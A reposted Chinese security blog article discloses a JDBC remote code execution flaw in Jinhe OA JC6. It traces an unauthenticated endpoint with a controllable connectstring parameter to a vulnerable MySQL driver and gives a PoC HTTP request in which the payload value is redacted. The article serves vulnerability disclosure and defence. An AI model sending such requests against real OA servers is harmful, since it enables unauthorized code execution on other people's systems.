文章总结： 本文披露了金和OAJC6系统存在的JDBC远程代码执行漏洞。该漏洞位于未授权接口/jc6/servlet/uploaddoc，攻击者通过传入key参数为getTreeXml并控制connectstring，可利用MySQL依赖版本漏洞执行恶意代码。文章详细分析了触发链路并给出了具体POC，建议受影响用户立即修复。 综合评分： 88 文章分类： 漏洞分析,漏洞POC,WEB安全

金和OA JC6 JDBC远程代码执行

原创

Ha1ey

安全白白

2025年10月23日 16:32 北京

Ha1ey@深蓝攻防实验室

本文章仅供学习交流使用，文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

/jc6/servlet/uploaddoc 此接口并不在鉴权范围，是未授权的接口

漏洞入口点代码，当我们传入的key参数是getTreeXml时会调用getTreeXml()方法

其中strConn可控，如果不为空就会到漏洞触发点

查看JC6的mysql依赖版本在漏洞

POC

POST /jc6/servlet/uploaddoc HTTP/1.1
Host: 172.20.0.31:8081
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Access-Control-Allow-Origins:1024
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 283

sTablename=1&sKeyvalue=1&sKeyvalue1=11&subPath=11&key=getTreeXml&connectstring=xxxxxx

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全白白 Ha1ey《金和OA JC6 JDBC远程代码执行》